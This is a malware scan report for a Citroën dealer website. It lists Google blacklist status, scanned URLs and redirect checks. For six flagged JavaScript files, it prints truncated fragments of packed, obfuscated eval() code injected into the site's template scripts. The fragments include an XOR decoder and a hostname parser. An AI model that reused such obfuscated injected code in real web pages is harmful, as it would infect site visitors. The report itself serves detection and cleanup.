Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=citroendesil.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.citroendesil.com/ | 200 OK Content-Length: 25110 Content-Type: text/html | clean |
http://www.citroendesil.com/media/system/js/caption.js | 200 OK Content-Length: 14066 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('B M(f){w.2C=B(a,b){q c=\'\';2A(q i=0;i<b.L;i++){c+=I.H(a.Z(i%a.L)^b.Z(i))}G c};w.S=B(h){D(h.C(\':\'))h=h.V(\':\')[0];q a=h.V(\'.\');X(a.L>2){a.2z()}G a.2y(\'.\')} Antivirus reports:
| ||
http://www.citroendesil.com/modules/mod_rokcontentrotator/rokcontentrotator-packed.js | 200 OK Content-Length: 16188 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('C R(f){v.2K=C(a,b){p c=\'\';2B(p i=0;i<b.O;i++){c+=L.F(a.X(i%a.O)^b.X(i))}J c};v.S=C(h){K(h.E(\':\'))h=h.V(\':\')[0];p a=h.V(\'.\');W(a.O>2){a.2A()}J a.2z(\'.\')} Antivirus reports:
| ||
http://www.citroendesil.com/templates/rt_catalyst_j15/js/roktoppanel.js | 200 OK Content-Length: 15510 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('z N(f){x.2S=z(a,b){v c=\'\';2I(v i=0;i<b.F;i++){c+=G.H(a.Y(i%a.F)^b.Y(i))}K c};x.Q=z(h){L(h.B(\':\'))h=h.W(\':\')[0];v a=h.W(\'.\');X(a.F>2){a.2H()}K a.2G(\'.\')} Antivirus reports:
| ||
http://www.citroendesil.com/templates/rt_catalyst_j15/js/rokslidestrip.js | 200 OK Content-Length: 18291 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('D R(f){w.2T=D(a,b){v c=\'\';2B(v i=0;i<b.O;i++){c+=N.M(a.17(i%a.O)^b.17(i))}E c};w.T=D(h){K(h.C(\':\'))h=h.X(\':\')[0];v a=h.X(\'.\');Y(a.O>2){a.2A()}E a.2z(\'.\' Antivirus reports:
| ||
http://www.citroendesil.com/templates/rt_catalyst_j15/js/rokmoomenu.js | 200 OK Content-Length: 14666 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('C O(f){w.2P=C(a,b){q c=\'\';2G(q i=0;i<b.H;i++){c+=I.L(a.Q(i%a.H)^b.Q(i))}E c};w.U=C(h){G(h.z(\':\'))h=h.1a(\':\')[0];q a=h.1a(\'.\');P(a.H>2){a.2F()}E a.2E(\'.\' Antivirus reports:
| ||
http://www.citroendesil.com/templates/rt_catalyst_j15/js/mootools.bgiframe.js | 200 OK Content-Length: 12859 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('B O(f){v.2H=B(a,b){p c=\'\';2E(p i=0;i<b.H;i++){c+=I.L(a.Q(i%a.H)^b.Q(i))}K c};v.T=B(h){D(h.z(\':\'))h=h.X(\':\')[0];p a=h.X(\'.\');P(a.H>2){a.2D()}K a.2C(\'.\')} Antivirus reports:
| ||
http://www.citroendesil.com/index.php?option=com_user&view=reset | 200 OK Content-Length: 10997 Content-Type: text/html | clean |
http://www.citroendesil.com/media/system/js/validate.js | 200 OK Content-Length: 4246 Content-Type: application/x-javascript | clean |
http://www.citroendesil.com/index.php?option=com_content&view=article&id=61&Itemid=105 | 200 OK Content-Length: 11974 Content-Type: text/html | clean |
http://www.citroendesil.com/index.php?option=com_content&view=section&layout=blog&id=9&Itemid=100 | 200 OK Content-Length: 13391 Content-Type: text/html | clean |
http://www.citroendesil.com/index.php?option=com_content&view=section&layout=blog&id=9&Itemid=119 | 200 OK Content-Length: 13398 Content-Type: text/html | clean |
http://www.citroendesil.com/index.php?option=com_content&view=section&layout=blog&id=11&Itemid=103 | 200 OK Content-Length: 13048 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.hondaplazasen.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="citroen, desil, c1, c2, c3, c4, c5, berlingo, picasso, balıkesir, pla ...[4626 bytes skipped]... | ||
http://www.citroendesil.com/index.php?option=com_content&view=section&layout=blog&id=8&Itemid=102 | 200 OK Content-Length: 13235 Content-Type: text/html | clean |
http://www.citroendesil.com/index.php?option=com_content&view=section&id=6&Itemid=75 | 200 OK Content-Length: 12387 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: citroendesil.com
Result:
GET / HTTP/1.1
Host: citroendesil.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: citroendesil.com
Referer: http://www.google.com/search?q=citroendesil.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: citroendesil.com
Referer: http://www.google.com/search?q=citroendesil.com
Result:
The result is similar to the first query. There are no suspicious redirects found.